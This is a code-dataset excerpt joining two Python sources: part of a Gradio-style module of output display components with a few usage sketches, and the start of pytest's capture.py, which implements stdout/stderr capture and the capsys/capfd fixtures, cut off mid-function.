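# or sorts and truncates a confidence dictionary.
def _example_label_postprocess():  # pragma: no cover - illustrative sketch only
    label_out = Label(num_top_classes=2)
    assert label_out.postprocess("cat") == {"label": "cat"}
    result = label_out.postprocess({"cat": 0.7, "dog": 0.2, "bird": 0.1})
    assert result["label"] == "cat"
    assert [c["label"] for c in result["confidences"]] == ["cat", "dog"]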
class Image(OutputComponent):
"""
Component displays an output image.
Output type: Union[numpy.array, PIL.Image, str, matplotlib.pyplot, Tuple[Union[numpy.array, PIL.Image, str], List[Tuple[str, float, float, float, float]]]]
Demos: image_mod, webcam
"""
def __init__(
self, type: str = "auto", plot: bool = False, label: Optional[str] = None
):
"""
Parameters:
type (str): Type of value to be passed to component. "numpy" expects a numpy array with shape (width, height, 3), "pil" expects a PIL image object, "file" expects a file path to the saved image or a remote URL, "plot" expects a matplotlib.pyplot object, "auto" detects return type.
plot (bool): DEPRECATED. Whether to expect a plot to be returned by the function.
label (str): component name in interface.
"""
if plot:
warnings.warn(
"The 'plot' parameter has been deprecated. Set parameter 'type' to 'plot' instead.",
DeprecationWarning,
)
self.type = "plot"
else:
self.type = type
super().__init__(label)
@classmethod
def get_shortcut_implementations(cls):
return {"image": {}, "plot": {"type": "plot"}, "pil": {"type": "pil"}}
def postprocess(self, y):
"""
Parameters:
y (Union[numpy.array, PIL.Image, str, matplotlib.pyplot, Tuple[Union[numpy.array, PIL.Image, str], List[Tuple[str, float, float, float, float]]]]): image in specified format
Returns:
(str): base64 url data
"""
if self.type == "auto":
if isinstance(y, np.ndarray):
dtype = "numpy"
elif isinstance(y, PIL.Image.Image):
dtype = "pil"
elif isinstance(y, str):
dtype = "file"
elif isinstance(y, ModuleType):
dtype = "plot"
else:
raise ValueError(
"Unknown type. Please choose from: 'numpy', 'pil', 'file', 'plot'."
)
else:
dtype = self.type
if dtype in ["numpy", "pil"]:
if dtype == "pil":
y = np.array(y)
out_y = processing_utils.encode_array_to_base64(y)
elif dtype == "file":
out_y = processing_utils.encode_url_or_file_to_base64(y)
elif dtype == "plot":
out_y = processing_utils.encode_plot_to_base64(y)
else:
raise ValueError(
"Unknown type: "
+ dtype
+ ". Please choose from: 'numpy', 'pil', 'file', 'plot'."
)
return out_y
def deserialize(self, x):
y = processing_utils.decode_base64_to_file(x).name
return y
def save_flagged(self, dir, label, data, encryption_key):
return self.save_flagged_file(dir, label, data, encryption_key)
def restore_flagged(self, dir, data, encryption_key):
return self.restore_flagged_file(dir, data, encryption_key)["data"]
class Video(OutputComponent):
"""
Used for video output.
Output type: filepath
Demos: video_flip
"""
def __init__(self, type: Optional[str] = None, label: Optional[str] = None):
"""
Parameters:
type (str): Type of video format to be passed to component, such as 'avi' or 'mp4'. Use 'mp4' to ensure browser playability. If set to None, video will keep returned format.
label (str): component name in interface.
"""
self.type = type
super().__init__(label)
@classmethod
def get_shortcut_implementations(cls):
return {"video": {}, "playable_video": {"type": "mp4"}}
def postprocess(self, y):
"""
Parameters:
y (str): path to video
Returns:
(str): base64 url data
"""
returned_format = y.split(".")[-1].lower()
if self.type is not None and returned_format != self.type:
output_file_name = y[0 : y.rindex(".") + 1] + self.type
ff = FFmpeg(inputs={y: None}, outputs={output_file_name: None})
ff.run()
y = output_file_name
return {
"name": os.path.basename(y),
"data": processing_utils.encode_file_to_base64(y),
}
def deserialize(self, x):
return processing_utils.decode_base64_to_file(x).name
def save_flagged(self, dir, label, data, encryption_key):
return self.save_flagged_file(dir, label, data["data"], encryption_key)
def restore_flagged(self, dir, data, encryption_key):
return self.restore_flagged_file(dir, data, encryption_key)
class KeyValues(OutputComponent):
"""
Component displays a table representing values for multiple fields.
Output type: Union[Dict, List[Tuple[str, Union[str, int, float]]]]
Demos: text_analysis
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface.
"""
super().__init__(label)
def postprocess(self, y):
"""
Parameters:
y (Union[Dict, List[Tuple[str, Union[str, int, float]]]]): dictionary or tuple list representing key value pairs
Returns:
(List[Tuple[str, Union[str, number]]]): list of key value pairs
"""
if isinstance(y, dict):
return list(y.items())
elif isinstance(y, list):
return y
else:
raise ValueError(
"The `KeyValues` output interface expects an output that is a dictionary whose keys are "
"labels and values are corresponding values."
)
@classmethod
def get_shortcut_implementations(cls):
return {
"key_values": {},
}
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(data)
def restore_flagged(self, dir, data, encryption_key):
return json.loads(data)
class HighlightedText(OutputComponent):
"""
Component creates text that contains spans that are highlighted by category or numerical value.
    Output is represented as a list of Tuple pairs, where the first element represents the span of text represented by the tuple, and the second element represents the category or value of the text.
Output type: List[Tuple[str, Union[float, str]]]
Demos: diff_texts, text_analysis
"""
def __init__(
self,
color_map: Dict[str, str] = None,
label: Optional[str] = None,
show_legend: bool = False,
):
"""
Parameters:
color_map (Dict[str, str]): Map between category and respective colors
label (str): component name in interface.
show_legend (bool): whether to show span categories in a separate legend or inline.
"""
self.color_map = color_map
self.show_legend = show_legend
super().__init__(label)
def get_template_context(self):
return {
"color_map": self.color_map,
"show_legend": self.show_legend,
**super().get_template_context(),
}
@classmethod
def get_shortcut_implementations(cls):
return {
"highlight": {},
}
def postprocess(self, y):
"""
Parameters:
y (Union[Dict, List[Tuple[str, Union[str, int, float]]]]): dictionary or tuple list representing key value pairs
Returns:
(List[Tuple[str, Union[str, number]]]): list of key value pairs
"""
return y
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(data)
def restore_flagged(self, dir, data, encryption_key):
return json.loads(data)
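# Usage sketch (illustrative only): output spans are (text, category) pairs;
# ``postprocess`` passes them through unchanged.
def _example_highlighted_text():  # pragma: no cover - illustrative sketch only
    out = HighlightedText(color_map={"ADJ": "green"}, show_legend=True)
    spans = [("The ", None), ("quick", "ADJ"), (" fox", None)]
    assert out.postprocess(spans) == spans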
class Audio(OutputComponent):
"""
Creates an audio player that plays the output audio.
Output type: Union[Tuple[int, numpy.array], str]
Demos: generate_tone, reverse_audio
"""
def __init__(self, type: str = "auto", label: Optional[str] = None):
"""
Parameters:
        type (str): Type of value to be passed to component. "numpy" returns a 2-element tuple with an integer sample_rate and the data as a 16-bit int numpy.array of shape (samples, 2), "file" returns a temporary file path to the saved wav audio file, "auto" detects return type.
label (str): component name in interface.
"""
self.type = type
super().__init__(label)
def get_template_context(self):
return {**super().get_template_context()}
@classmethod
def get_shortcut_implementations(cls):
return {
"audio": {},
}
def postprocess(self, y):
"""
Parameters:
y (Union[Tuple[int, numpy.array], str]): audio data in requested format
Returns:
(str): base64 url data
"""
if self.type in ["numpy", "file", "auto"]:
if self.type == "numpy" or (self.type == "auto" and isinstance(y, tuple)):
sample_rate, data = y
file = tempfile.NamedTemporaryFile(
prefix="sample", suffix=".wav", delete=False
)
processing_utils.audio_to_file(sample_rate, data, file.name)
y = file.name
return processing_utils.encode_url_or_file_to_base64(y)
else:
raise ValueError(
"Unknown type: " + self.type + ". Please choose from: 'numpy', 'file'."
)
def deserialize(self, x):
return processing_utils.decode_base64_to_file(x).name
def save_flagged(self, dir, label, data, encryption_key):
return self.save_flagged_file(dir, label, data, encryption_key)
def restore_flagged(self, dir, data, encryption_key):
return self.restore_flagged_file(dir, data, encryption_key)["data"]
class JSON(OutputComponent):
"""
Used for JSON output. Expects a JSON string or a Python object that is JSON serializable.
Output type: Union[str, Any]
Demos: zip_to_json
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface.
"""
super().__init__(label)
def postprocess(self, y):
"""
Parameters:
y (Union[Dict, List, str]): JSON output
Returns:
(Union[Dict, List]): JSON output
"""
        if isinstance(y, str):
            return json.loads(y)
else:
return y
@classmethod
def get_shortcut_implementations(cls):
return {
"json": {},
}
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(data)
def restore_flagged(self, dir, data, encryption_key):
return json.loads(data)
class HTML(OutputComponent):
"""
Used for HTML output. Expects an HTML valid string.
Output type: str
Demos: text_analysis
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface.
"""
super().__init__(label)
def postprocess(self, x):
"""
Parameters:
        x (str): HTML output
Returns:
(str): HTML output
"""
return x
@classmethod
def get_shortcut_implementations(cls):
return {
"html": {},
}
class File(OutputComponent):
"""
Used for file output.
Output type: Union[file-like, str]
Demos: zip_two_files
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface.
"""
super().__init__(label)
@classmethod
def get_shortcut_implementations(cls):
return {
"file": {},
}
def postprocess(self, y):
"""
Parameters:
y (str): file path
Returns:
(Dict[name: str, size: number, data: str]): JSON object with key 'name' for filename, 'data' for base64 url, and 'size' for filesize in bytes
"""
return {
"name": os.path.basename(y),
"size": os.path.getsize(y),
"data": processing_utils.encode_file_to_base64(y),
}
def save_flagged(self, dir, label, data, encryption_key):
return self.save_flagged_file(dir, label, data["data"], encryption_key)
def restore_flagged(self, dir, data, encryption_key):
return self.restore_flagged_file(dir, data, encryption_key)
class Dataframe(OutputComponent):
"""
Component displays 2D output through a spreadsheet interface.
Output type: Union[pandas.DataFrame, numpy.array, List[Union[str, float]], List[List[Union[str, float]]]]
Demos: filter_records, matrix_transpose, fraud_detector
"""
def __init__(
self,
headers: Optional[List[str]] = None,
max_rows: Optional[int] = 20,
max_cols: Optional[int] = None,
overflow_row_behaviour: str = "paginate",
type: str = "auto",
label: Optional[str] = None,
):
"""
Parameters:
headers (List[str]): Header names to dataframe. Only applicable if type is "numpy" or "array".
max_rows (int): Maximum number of rows to display at once. Set to None for infinite.
max_cols (int): Maximum number of columns to display at once. Set to None for infinite.
overflow_row_behaviour (str): If set to "paginate", will create pages for overflow rows. If set to "show_ends", will show initial and final rows and truncate middle rows.
type (str): Type of value to be passed to component. "pandas" for pandas dataframe, "numpy" for numpy array, or "array" for Python array, "auto" detects return type.
label (str): component name in interface.
"""
self.headers = headers
self.max_rows = max_rows
self.max_cols = max_cols
self.overflow_row_behaviour = overflow_row_behaviour
self.type = type
super().__init__(label)
def get_template_context(self):
return {
"headers": self.headers,
"max_rows": self.max_rows,
"max_cols": self.max_cols,
"overflow_row_behaviour": self.overflow_row_behaviour,
**super().get_template_context(),
}
@classmethod
def get_shortcut_implementations(cls):
return {
"dataframe": {},
"numpy": {"type": "numpy"},
"matrix": {"type": "array"},
"list": {"type": "array"},
}
def postprocess(self, y):
"""
Parameters:
y (Union[pandas.DataFrame, numpy.array, List[Union[str, float]], List[List[Union[str, float]]]]): dataframe in given format
Returns:
(Dict[headers: List[str], data: List[List[Union[str, number]]]]): JSON object with key 'headers' for list of header names, 'data' for 2D array of string or numeric data
"""
if self.type == "auto":
if isinstance(y, pd.core.frame.DataFrame):
dtype = "pandas"
elif isinstance(y, np.ndarray):
dtype = "numpy"
elif isinstance(y, list):
dtype = "array"
else:
dtype = self.type
if dtype == "pandas":
return {"headers": list(y.columns), "data": y.values.tolist()}
elif dtype in ("numpy", "array"):
if dtype == "numpy":
y = y.tolist()
if len(y) == 0 or not isinstance(y[0], list):
y = [y]
return {"data": y}
else:
raise ValueError(
"Unknown type: "
+ self.type
+ ". Please choose from: 'pandas', 'numpy', 'array'."
)
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(data["data"])
def restore_flagged(self, dir, data, encryption_key):
return {"data": json.loads(data)}
class Carousel(OutputComponent):
"""
Component displays a set of output components that can be scrolled through.
Output type: List[List[Any]]
Demos: disease_report
"""
def __init__(
self,
components: OutputComponent | List[OutputComponent],
label: Optional[str] = None,
):
"""
Parameters:
components (Union[List[OutputComponent], OutputComponent]): Classes of component(s) that will be scrolled through.
label (str): component name in interface.
"""
if not isinstance(components, list):
components = [components]
self.components = [get_output_instance(component) for component in components]
super().__init__(label)
def get_template_context(self):
return {
"components": [
component.get_template_context() for component in self.components
],
**super().get_template_context(),
}
def postprocess(self, y):
"""
Parameters:
y (List[List[Any]]): carousel output
Returns:
(List[List[Any]]): 2D array, where each sublist represents one set of outputs or 'slide' in the carousel
"""
if isinstance(y, list):
if len(y) != 0 and not isinstance(y[0], list):
y = [[z] for z in y]
output = []
for row in y:
output_row = []
for i, cell in enumerate(row):
output_row.append(self.components[i].postprocess(cell))
output.append(output_row)
return output
else:
raise ValueError("Unknown type. Please provide a list for the Carousel.")
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(
[
[
component.save_flagged(
dir, f"{label}_{j}", data[i][j], encryption_key
)
for j, component in enumerate(self.components)
]
for i, _ in enumerate(data)
]
)
def restore_flagged(self, dir, data, encryption_key):
return [
[
component.restore_flagged(dir, sample, encryption_key)
for component, sample in zip(self.components, sample_set)
]
for sample_set in json.loads(data)
]
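# Usage sketch (illustrative only): each inner list is one carousel "slide",
# with every cell routed through the matching component's ``postprocess``.
def _example_carousel_postprocess():  # pragma: no cover - illustrative sketch only
    car = Carousel(components=[Textbox(), Textbox()], label="slides")
    assert car.postprocess([["a", 1], ["b", 2]]) == [["a", "1"], ["b", "2"]]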
class Timeseries(OutputComponent):
"""
Component accepts pandas.DataFrame.
Output type: pandas.DataFrame
Demos: fraud_detector
"""
def __init__(
self, x: str = None, y: str | List[str] = None, label: Optional[str] = None
):
"""
Parameters:
x (str): Column name of x (time) series. None if csv has no headers, in which case first column is x series.
y (Union[str, List[str]]): Column name of y series, or list of column names if multiple series. None if csv has no headers, in which case every column after first is a y series.
label (str): component name in interface.
"""
self.x = x
if isinstance(y, str):
y = [y]
self.y = y
super().__init__(label)
def get_template_context(self):
return {"x": self.x, "y": self.y, **super().get_template_context()}
@classmethod
def get_shortcut_implementations(cls):
return {
"timeseries": {},
}
def postprocess(self, y):
"""
Parameters:
y (pandas.DataFrame): timeseries data
Returns:
(Dict[headers: List[str], data: List[List[Union[str, number]]]]): JSON object with key 'headers' for list of header names, 'data' for 2D array of string or numeric data
"""
return {"headers": y.columns.values.tolist(), "data": y.values.tolist()}
def save_flagged(self, dir, label, data, encryption_key):
"""
Returns: (List[List[Union[str, float]]]) 2D array
"""
return json.dumps(data)
def restore_flagged(self, dir, data, encryption_key):
return json.loads(data)
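# Usage sketch (illustrative only): a dataframe is flattened into the same
# ``headers``/``data`` payload used by the Dataframe component.
def _example_timeseries_postprocess():  # pragma: no cover - illustrative sketch only
    ts = Timeseries(x="t", y="value")
    df = pd.DataFrame({"t": [0.0, 1.0], "value": [10.0, 10.5]})
    assert ts.postprocess(df) == {"headers": ["t", "value"], "data": [[0.0, 10.0], [1.0, 10.5]]}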
class State(OutputComponent):
"""
Special hidden component that stores state across runs of the interface.
Output type: Any
Demos: chatbot
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface (not used).
"""
super().__init__(label)
@classmethod
def get_shortcut_implementations(cls):
return {
"state": {},
}
def get_output_instance(iface: Interface):
if isinstance(iface, str):
shortcut = OutputComponent.get_all_shortcut_implementations()[iface]
return shortcut[0](**shortcut[1])
# a dict with `name` as the output component type and other keys as parameters
elif isinstance(iface, dict):
name = iface.pop("name")
for component in OutputComponent.__subclasses__():
if component.__name__.lower() == name:
break
else:
raise ValueError("No such OutputComponent: {}".format(name))
return component(**iface)
elif isinstance(iface, OutputComponent):
return iface
else:
raise ValueError(
"Output interface must be of type `str` or `dict` or"
"`OutputComponent` but is {}".format(iface)
)
avg_line_length: 33.736591 | max_line_length: 289 | alphanum_fraction: 0.581735
hexsha: e144495e27aca0f9ece82a2e2fe2d42705ec5444 | size: 26,547 | ext: py | lang: Python
max_stars/max_issues/max_forks repo_path: src/_pytest/capture.py | repo_name: dougthor42/pytest | repo_head_hexsha: 0118f1c081dcd1c6b6de49bc2f7fa5bc2494753b | repo_licenses: ["MIT"]
max_stars_count / max_issues_count / max_forks_count: null | event datetimes: null
"""
per-test stdout/stderr capturing mechanism.
"""
import collections
import contextlib
import io
import os
import sys
from io import UnsupportedOperation
from tempfile import TemporaryFile
import pytest
from _pytest.compat import CaptureIO
from _pytest.fixtures import FixtureRequest
patchsysdict = {0: "stdin", 1: "stdout", 2: "stderr"}
def pytest_addoption(parser):
group = parser.getgroup("general")
group._addoption(
"--capture",
action="store",
default="fd" if hasattr(os, "dup") else "sys",
metavar="method",
choices=["fd", "sys", "no"],
help="per-test capturing method: one of fd|sys|no.",
)
group._addoption(
"-s",
action="store_const",
const="no",
dest="capture",
help="shortcut for --capture=no.",
)
@pytest.hookimpl(hookwrapper=True)
def pytest_load_initial_conftests(early_config, parser, args):
ns = early_config.known_args_namespace
if ns.capture == "fd":
_py36_windowsconsoleio_workaround(sys.stdout)
_colorama_workaround()
_readline_workaround()
pluginmanager = early_config.pluginmanager
capman = CaptureManager(ns.capture)
pluginmanager.register(capman, "capturemanager")
# make sure that capturemanager is properly reset at final shutdown
early_config.add_cleanup(capman.stop_global_capturing)
# finally trigger conftest loading but while capturing (issue93)
capman.start_global_capturing()
outcome = yield
capman.suspend_global_capture()
if outcome.excinfo is not None:
out, err = capman.read_global_capture()
sys.stdout.write(out)
sys.stderr.write(err)
class CaptureManager:
"""
    Capture plugin: manages enabling and disabling the appropriate capture method during collection and each
    test phase (setup, call, teardown). After each of those points, the captured output is obtained and
    attached to the collection/runtest report.
There are two levels of capture:
* global: which is enabled by default and can be suppressed by the ``-s`` option. This is always enabled/disabled
during collection and each test phase.
    * fixture: when a test function or one of its fixtures depends on the ``capsys`` or ``capfd`` fixtures. In this
case special handling is needed to ensure the fixtures take precedence over the global capture.
"""
def __init__(self, method):
self._method = method
self._global_capturing = None
self._current_item = None
def __repr__(self):
return "<CaptureManager _method={!r} _global_capturing={!r} _current_item={!r}>".format(
self._method, self._global_capturing, self._current_item
)
def _getcapture(self, method):
if method == "fd":
return MultiCapture(out=True, err=True, Capture=FDCapture)
elif method == "sys":
return MultiCapture(out=True, err=True, Capture=SysCapture)
elif method == "no":
return MultiCapture(out=False, err=False, in_=False)
raise ValueError("unknown capturing method: %r" % method) # pragma: no cover
def is_capturing(self):
if self.is_globally_capturing():
return "global"
capture_fixture = getattr(self._current_item, "_capture_fixture", None)
if capture_fixture is not None:
return (
"fixture %s" % self._current_item._capture_fixture.request.fixturename
)
return False
# Global capturing control
def is_globally_capturing(self):
return self._method != "no"
def start_global_capturing(self):
assert self._global_capturing is None
self._global_capturing = self._getcapture(self._method)
self._global_capturing.start_capturing()
def stop_global_capturing(self):
if self._global_capturing is not None:
self._global_capturing.pop_outerr_to_orig()
self._global_capturing.stop_capturing()
self._global_capturing = None
def resume_global_capture(self):
# During teardown of the python process, and on rare occasions, capture
# attributes can be `None` while trying to resume global capture.
if self._global_capturing is not None:
self._global_capturing.resume_capturing()
def suspend_global_capture(self, in_=False):
cap = getattr(self, "_global_capturing", None)
if cap is not None:
cap.suspend_capturing(in_=in_)
def suspend(self, in_=False):
# Need to undo local capsys-et-al if it exists before disabling global capture.
self.suspend_fixture(self._current_item)
self.suspend_global_capture(in_)
def resume(self):
self.resume_global_capture()
self.resume_fixture(self._current_item)
def read_global_capture(self):
return self._global_capturing.readouterr()
# Fixture Control (it's just forwarding, think about removing this later)
def activate_fixture(self, item):
"""If the current item is using ``capsys`` or ``capfd``, activate them so they take precedence over
the global capture.
"""
fixture = getattr(item, "_capture_fixture", None)
if fixture is not None:
fixture._start()
def deactivate_fixture(self, item):
"""Deactivates the ``capsys`` or ``capfd`` fixture of this item, if any."""
fixture = getattr(item, "_capture_fixture", None)
if fixture is not None:
fixture.close()
def suspend_fixture(self, item):
fixture = getattr(item, "_capture_fixture", None)
if fixture is not None:
fixture._suspend()
def resume_fixture(self, item):
fixture = getattr(item, "_capture_fixture", None)
if fixture is not None:
fixture._resume()
# Helper context managers
@contextlib.contextmanager
def global_and_fixture_disabled(self):
"""Context manager to temporarily disable global and current fixture capturing."""
self.suspend()
try:
yield
finally:
self.resume()
@contextlib.contextmanager
def item_capture(self, when, item):
self.resume_global_capture()
self.activate_fixture(item)
try:
yield
finally:
self.deactivate_fixture(item)
self.suspend_global_capture(in_=False)
out, err = self.read_global_capture()
item.add_report_section(when, "stdout", out)
item.add_report_section(when, "stderr", err)
# Hooks
@pytest.hookimpl(hookwrapper=True)
def pytest_make_collect_report(self, collector):
if isinstance(collector, pytest.File):
self.resume_global_capture()
outcome = yield
self.suspend_global_capture()
out, err = self.read_global_capture()
rep = outcome.get_result()
if out:
rep.sections.append(("Captured stdout", out))
if err:
rep.sections.append(("Captured stderr", err))
else:
yield
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_protocol(self, item):
self._current_item = item
yield
self._current_item = None
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_setup(self, item):
with self.item_capture("setup", item):
yield
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_call(self, item):
with self.item_capture("call", item):
yield
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_teardown(self, item):
with self.item_capture("teardown", item):
yield
@pytest.hookimpl(tryfirst=True)
def pytest_keyboard_interrupt(self, excinfo):
self.stop_global_capturing()
@pytest.hookimpl(tryfirst=True)
def pytest_internalerror(self, excinfo):
self.stop_global_capturing()
capture_fixtures = {"capfd", "capfdbinary", "capsys", "capsysbinary"}
def _ensure_only_one_capture_fixture(request: FixtureRequest, name):
fixtures = sorted(set(request.fixturenames) & capture_fixtures - {name})
if fixtures:
arg = fixtures[0] if len(fixtures) == 1 else fixtures
raise request.raiseerror(
"cannot use {} and {} at the same time".format(arg, name)
)
@pytest.fixture
def capsys(request):
"""Enable text capturing of writes to ``sys.stdout`` and ``sys.stderr``.
The captured output is made available via ``capsys.readouterr()`` method
calls, which return a ``(out, err)`` namedtuple.
``out`` and ``err`` will be ``text`` objects.
"""
_ensure_only_one_capture_fixture(request, "capsys")
with _install_capture_fixture_on_item(request, SysCapture) as fixture:
yield fixture
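# Usage sketch (illustrative only, not part of the plugin): a test function
# consuming the ``capsys`` fixture defined above.
def _example_capsys_test(capsys):  # pragma: no cover - illustrative sketch only
    print("hello")
    out, err = capsys.readouterr()
    assert out == "hello\n"
    assert err == ""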
@pytest.fixture
def capsysbinary(request):
"""Enable bytes capturing of writes to ``sys.stdout`` and ``sys.stderr``.
The captured output is made available via ``capsysbinary.readouterr()``
method calls, which return a ``(out, err)`` namedtuple.
``out`` and ``err`` will be ``bytes`` objects.
"""
_ensure_only_one_capture_fixture(request, "capsysbinary")
with _install_capture_fixture_on_item(request, SysCaptureBinary) as fixture:
yield fixture
@pytest.fixture
def capfd(request):
"""Enable text capturing of writes to file descriptors ``1`` and ``2``.
The captured output is made available via ``capfd.readouterr()`` method
calls, which return a ``(out, err)`` namedtuple.
``out`` and ``err`` will be ``text`` objects.
"""
_ensure_only_one_capture_fixture(request, "capfd")
if not hasattr(os, "dup"):
pytest.skip(
"capfd fixture needs os.dup function which is not available in this system"
)
with _install_capture_fixture_on_item(request, FDCapture) as fixture:
yield fixture
@pytest.fixture
def capfdbinary(request):
"""Enable bytes capturing of writes to file descriptors ``1`` and ``2``.
The captured output is made available via ``capfd.readouterr()`` method
calls, which return a ``(out, err)`` namedtuple.
``out`` and ``err`` will be ``byte`` objects.
"""
_ensure_only_one_capture_fixture(request, "capfdbinary")
if not hasattr(os, "dup"):
pytest.skip(
"capfdbinary fixture needs os.dup function which is not available in this system"
)
with _install_capture_fixture_on_item(request, FDCaptureBinary) as fixture:
yield fixture
@contextlib.contextmanager
def _install_capture_fixture_on_item(request, capture_class):
"""
Context manager which creates a ``CaptureFixture`` instance and "installs" it on
the item/node of the given request. Used by ``capsys`` and ``capfd``.
    The CaptureFixture is added as attribute of the item because it needs to be accessed
by ``CaptureManager`` during its ``pytest_runtest_*`` hooks.
"""
request.node._capture_fixture = fixture = CaptureFixture(capture_class, request)
capmanager = request.config.pluginmanager.getplugin("capturemanager")
    # Need to activate this fixture right away in case it is being used by another fixture (setup phase).
# If this fixture is being used only by a test function (call phase), then we wouldn't need this
# activation, but it doesn't hurt.
capmanager.activate_fixture(request.node)
yield fixture
fixture.close()
del request.node._capture_fixture
class CaptureFixture:
"""
Object returned by :py:func:`capsys`, :py:func:`capsysbinary`, :py:func:`capfd` and :py:func:`capfdbinary`
fixtures.
"""
def __init__(self, captureclass, request):
self.captureclass = captureclass
self.request = request
self._capture = None
self._captured_out = self.captureclass.EMPTY_BUFFER
self._captured_err = self.captureclass.EMPTY_BUFFER
def _start(self):
if self._capture is None:
self._capture = MultiCapture(
out=True, err=True, in_=False, Capture=self.captureclass
)
self._capture.start_capturing()
def close(self):
if self._capture is not None:
out, err = self._capture.pop_outerr_to_orig()
self._captured_out += out
self._captured_err += err
self._capture.stop_capturing()
self._capture = None
def readouterr(self):
"""Read and return the captured output so far, resetting the internal buffer.
:return: captured content as a namedtuple with ``out`` and ``err`` string attributes
"""
captured_out, captured_err = self._captured_out, self._captured_err
if self._capture is not None:
out, err = self._capture.readouterr()
captured_out += out
captured_err += err
self._captured_out = self.captureclass.EMPTY_BUFFER
self._captured_err = self.captureclass.EMPTY_BUFFER
return CaptureResult(captured_out, captured_err)
def _suspend(self):
"""Suspends this fixture's own capturing temporarily."""
if self._capture is not None:
self._capture.suspend_capturing()
def _resume(self):
"""Resumes this fixture's own capturing temporarily."""
if self._capture is not None:
self._capture.resume_capturing()
@contextlib.contextmanager
def disabled(self):
"""Temporarily disables capture while inside the 'with' block."""
capmanager = self.request.config.pluginmanager.getplugin("capturemanager")
with capmanager.global_and_fixture_disabled():
yield
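# Usage sketch (illustrative only): temporarily writing to the real stdout
# from inside a captured test via ``disabled()``.
def _example_capsys_disabled(capsys):  # pragma: no cover - illustrative sketch only
    print("captured as usual")
    with capsys.disabled():
        print("this goes straight to the real terminal")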
def safe_text_dupfile(f, mode, default_encoding="UTF8"):
""" return an open text file object that's a duplicate of f on the
FD-level if possible.
"""
encoding = getattr(f, "encoding", None)
try:
fd = f.fileno()
except Exception:
if "b" not in getattr(f, "mode", "") and hasattr(f, "encoding"):
# we seem to have a text stream, let's just use it
return f
else:
newfd = os.dup(fd)
if "b" not in mode:
mode += "b"
f = os.fdopen(newfd, mode, 0) # no buffering
return EncodedFile(f, encoding or default_encoding)
class EncodedFile:
errors = "strict" # possibly needed by py3 code (issue555)
def __init__(self, buffer, encoding):
self.buffer = buffer
self.encoding = encoding
def write(self, obj):
if isinstance(obj, str):
obj = obj.encode(self.encoding, "replace")
else:
raise TypeError(
"write() argument must be str, not {}".format(type(obj).__name__)
)
self.buffer.write(obj)
def writelines(self, linelist):
data = "".join(linelist)
self.write(data)
@property
def name(self):
"""Ensure that file.name is a string."""
return repr(self.buffer)
@property
def mode(self):
return self.buffer.mode.replace("b", "")
def __getattr__(self, name):
return getattr(object.__getattribute__(self, "buffer"), name)
CaptureResult = collections.namedtuple("CaptureResult", ["out", "err"])
class MultiCapture:
out = err = in_ = None
_state = None
def __init__(self, out=True, err=True, in_=True, Capture=None):
if in_:
self.in_ = Capture(0)
if out:
self.out = Capture(1)
if err:
self.err = Capture(2)
def __repr__(self):
return "<MultiCapture out={!r} err={!r} in_={!r} _state={!r} _in_suspended={!r}>".format(
self.out,
self.err,
self.in_,
self._state,
getattr(self, "_in_suspended", "<UNSET>"),
)
def start_capturing(self):
self._state = "started"
if self.in_:
self.in_.start()
if self.out:
self.out.start()
if self.err:
self.err.start()
def pop_outerr_to_orig(self):
""" pop current snapshot out/err capture and flush to orig streams. """
out, err = self.readouterr()
if out:
self.out.writeorg(out)
if err:
self.err.writeorg(err)
return out, err
def suspend_capturing(self, in_=False):
self._state = "suspended"
if self.out:
self.out.suspend()
if self.err:
self.err.suspend()
if in_ and self.in_:
self.in_.suspend()
self._in_suspended = True
def resume_capturing(self):
self._state = "resumed"
if self.out:
self.out.resume()
if self.err:
self.err.resume()
if hasattr(self, "_in_suspended"):
self.in_.resume()
del self._in_suspended
def stop_capturing(self):
""" stop capturing and reset capturing streams """
if self._state == "stopped":
raise ValueError("was already stopped")
self._state = "stopped"
if self.out:
self.out.done()
if self.err:
self.err.done()
if self.in_:
self.in_.done()
def readouterr(self):
""" return snapshot unicode value of stdout/stderr capturings. """
return CaptureResult(
self.out.snap() if self.out is not None else "",
self.err.snap() if self.err is not None else "",
)
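# Usage sketch (illustrative only): driving MultiCapture directly with
# SysCapture, outside the CaptureManager machinery.
def _example_multicapture():  # pragma: no cover - illustrative sketch only
    cap = MultiCapture(out=True, err=True, in_=False, Capture=SysCapture)
    cap.start_capturing()
    print("captured")
    out, err = cap.readouterr()
    cap.stop_capturing()
    assert out == "captured\n" and err == ""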
class NoCapture:
EMPTY_BUFFER = None
__init__ = start = done = suspend = resume = lambda *args: None
class FDCaptureBinary:
"""Capture IO to/from a given os-level filedescriptor.
snap() produces `bytes`
"""
EMPTY_BUFFER = b""
_state = None
def __init__(self, targetfd, tmpfile=None):
self.targetfd = targetfd
try:
self.targetfd_save = os.dup(self.targetfd)
except OSError:
self.start = lambda: None
self.done = lambda: None
else:
self.start = self._start
self.done = self._done
if targetfd == 0:
assert not tmpfile, "cannot set tmpfile with stdin"
tmpfile = open(os.devnull, "r")
self.syscapture = SysCapture(targetfd)
else:
if tmpfile is None:
f = TemporaryFile()
with f:
tmpfile = safe_text_dupfile(f, mode="wb+")
if targetfd in patchsysdict:
self.syscapture = SysCapture(targetfd, tmpfile)
else:
self.syscapture = NoCapture()
self.tmpfile = tmpfile
self.tmpfile_fd = tmpfile.fileno()
def __repr__(self):
return "<FDCapture {} oldfd={} _state={!r}>".format(
self.targetfd, getattr(self, "targetfd_save", None), self._state
)
def _start(self):
""" Start capturing on targetfd using memorized tmpfile. """
try:
os.fstat(self.targetfd_save)
except (AttributeError, OSError):
raise ValueError("saved filedescriptor not valid anymore")
os.dup2(self.tmpfile_fd, self.targetfd)
self.syscapture.start()
self._state = "started"
def snap(self):
self.tmpfile.seek(0)
res = self.tmpfile.read()
self.tmpfile.seek(0)
self.tmpfile.truncate()
return res
def _done(self):
